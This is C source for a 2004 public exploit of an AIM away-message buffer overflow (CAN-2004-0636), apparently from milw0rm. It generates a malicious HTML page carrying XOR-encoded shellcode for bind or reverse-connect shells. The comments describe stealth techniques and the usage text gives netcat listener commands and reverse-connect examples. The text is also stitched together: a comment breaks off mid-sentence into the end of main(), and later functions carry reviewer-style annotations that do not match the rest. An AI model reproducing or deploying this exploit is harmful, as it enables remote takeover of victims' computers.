/* CAN-2004-0636 */
/*
 * AIM Away Message Buffer Overflow Exploit
 * Exploit by John Bissell A.K.A. HighT1mes
 *
 * Exploit:
 * ========
 * drizzit.c
 *
 * Vulnerable Software:
 * ====================
 * - AIM 5.5.3588
 * - AIM 5.5.3590 Beta
 * - AIM 5.5.3591
 * - AIM 5.5.3595
 * and a couple of other versions...
 *
 * If you want to try other return addresses for other versions of
 * AIM then edit the return address. But the current one embedded
 * will work for sure with all the AIM versions listed above.
 *
 * I used some of the Metasploit shellcode for this exploit, with some
 * modifications to put it into stealth mode so the attack is harder to
 * detect. Since I'm using Metasploit shellcode, this exploit can be
 * used on any NT-type OS, like Win2k, WinNT or WinXP, across any
 * service pack. I don't know about SP2 though; I haven't tested it yet.
 *
 * On a side note, I purposely did not include the download+exec
 * shellcode even though I have it, because I'm sick and tired of these
 * little spam/adware crooks messing up people's computers for profit.
 * You can still download/upload through the shell to the victim; it
 * just isn't automated like download+exec would be.
 *
 * In my opinion the reverse connect (-r option) is the most dangerous,
 * because you can encode your IP address and pick a port, and then when
 * the victim visits the evil web page or email or whatever, the attack
 * will automatically open their AIM even if it is not already open,
 * connect back to you, and then terminate the AIM process to stay
 * stealthy so the victim doesn't know what hit them. As I remind people
 * in the exploit usage, you need to remember to use netcat to listen on
 * the port you picked for the exploit to connect to...
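* * One reason I decided to include the generation of html code for * this exploit is I noticed almost no puts small limits on the * \n"); fprintf(EXPLOIT_FP, "\n"); fprintf(EXPLOIT_FP, "\n"); fclose(EXPLOIT_FP); /* im to lazy to make a macro for this banner :P */ printf(" +-------------------------------------------------+\n"); printf(" | AIM Exploit by John Bissell A.K.A. HighT1mes |\n"); printf(" | AIM Away Message Buffer Overflow Exploit |\n"); printf(" +-------------------------------------------------+\n\n"); printf(" Exploit created!\n\n"); printf(" Remember if you use the -r option to have netcat listening\n"); printf(" on the port you are using for the attack so the victim will\n"); printf(" be able to connect to you when exploited...\n\n"); printf(" Example:\n"); printf("\tnc.exe -l -p %d", port); } return(EXIT_SUCCESS); }

/*
 * Print the banner and the command-line help, then terminate the process.
 *
 * prog_name: the program name the caller wants shown in the examples
 *            (argv[0], presumably). It is only ever substituted through
 *            "%s" and never used as a format string, so an unusual
 *            program name cannot corrupt the output.
 *
 * Never returns. The help is printed in response to bad or missing
 * arguments, so the process ends with EXIT_FAILURE. The original called
 * exit(-1), which most shells report as status 255: a non-portable value
 * and inconsistent with the EXIT_SUCCESS used on the normal path.
 *
 * Every string below is emitted byte-for-byte as before (including the
 * "standerd" typo and the missing trailing newline on the last line), so
 * scripts that scrape the usage text keep working.
 */
void print_usage(char *prog_name)
{
    /* Banner, identical to the one printed after a successful build. */
    fputs(" +-------------------------------------------------+\n", stdout);
    fputs(" | AIM Exploit by John Bissell A.K.A. HighT1mes |\n", stdout);
    fputs(" | AIM Away Message Buffer Overflow Exploit |\n", stdout);
    fputs(" +-------------------------------------------------+\n\n", stdout);

    /* Synopsis. */
    fputs(" Exploit Usage:\n", stdout);
    printf("\t%s -r your_ip | -b [-p port] -o | -e outfile\n\n", prog_name);

    /* Option descriptions; adjacent literals concatenate to the same text. */
    fputs(" Parameters:\n", stdout);
    fputs("\t-r your_ip or -b\t Choose -r for reverse connect attack mode\n"
          "\t\t\t\t and choose -b for a bind attack. By default\n"
          "\t\t\t\t if you don't specify -r or -b then a bind\n"
          "\t\t\t\t attack will be generated.\n\n", stdout);
    fputs("\t-p (optional)\t\t This option will allow you to change the port \n"
          "\t\t\t\t used for a bind or reverse connect attack.\n"
          "\t\t\t\t If the attack mode is bind then the\n"
          "\t\t\t\t victim will open the -p port. If the attack\n"
          "\t\t\t\t mode is reverse connect then the port you\n"
          "\t\t\t\t specify will be the one you want to listen\n"
          "\t\t\t\t on so the victim can connect to you\n"
          "\t\t\t\t right away.\n\n", stdout);
    fputs("\t-o or -e outfile\t\t Here you specify the output method...\n"
          "\t\t\t\t If you would like output go straight to\n"
          "\t\t\t\t standerd output then specify the -o option\n"
          "\t\t\t\t otherwise give the path of where you want to\n"
          "\t\t\t\t create the exploit file which is basically\n"
          "\t\t\t\t a simple html file. The -o option is useful if\n"
          "\t\t\t\t you want to test the exploit url in\n"
          "\t\t\t\t different ways.\n\n", stdout);

    /* Worked examples; the IP and ports are illustrative only. */
    fputs(" Examples:\n", stdout);
    printf("\t%s -r 68.6.47.62 -p 8888 -e c:\\exploit.html\n", prog_name);
    printf("\t%s -b -p 1542 -e c:\\new_exploit.html\n", prog_name);
    printf("\t%s -b -o\n", prog_name);
    printf("\t%s -r 68.6.47.62 -o\n\n", prog_name);

    /* Reverse-connect reminder: the listener must be up before the
     * target opens the page, or the callback is simply lost. */
    fputs(" Remember if you use the -r option to have netcat listening\n"
          " on the port you are using for the attack so the victim will\n"
          " be able to connect to you when exploited...\n\n", stdout);
    fputs(" Example:\n", stdout);
    fputs("\tnc.exe -l -p 8888", stdout);

    /* exit() flushes stdio, so the un-terminated last line still appears. */
    exit(EXIT_FAILURE);
}

/*
 * Single-byte key XORed over every payload byte. The decoder stub inside
 * the shellcode presumably uses the same constant, so the two must be
 * changed together or the payload will not decode -- verify against the
 * shellcode before touching this. NOTE(review): a fixed single-byte XOR
 * only defeats naive byte-pattern signatures; the key space is 256
 * values, so this is obfuscation, not protection.
 */
enum { XOR_KEY = 0x92 };

/*
 * Encode (or decode -- XOR is its own inverse) one payload byte.
 *
 * byte: the raw byte.
 * Returns byte ^ XOR_KEY, truncated back to unsigned char.
 */
unsigned char xor_data(unsigned char byte)
{
    return (unsigned char)(byte ^ XOR_KEY);
}

// milw0rm.com [2004-09-02]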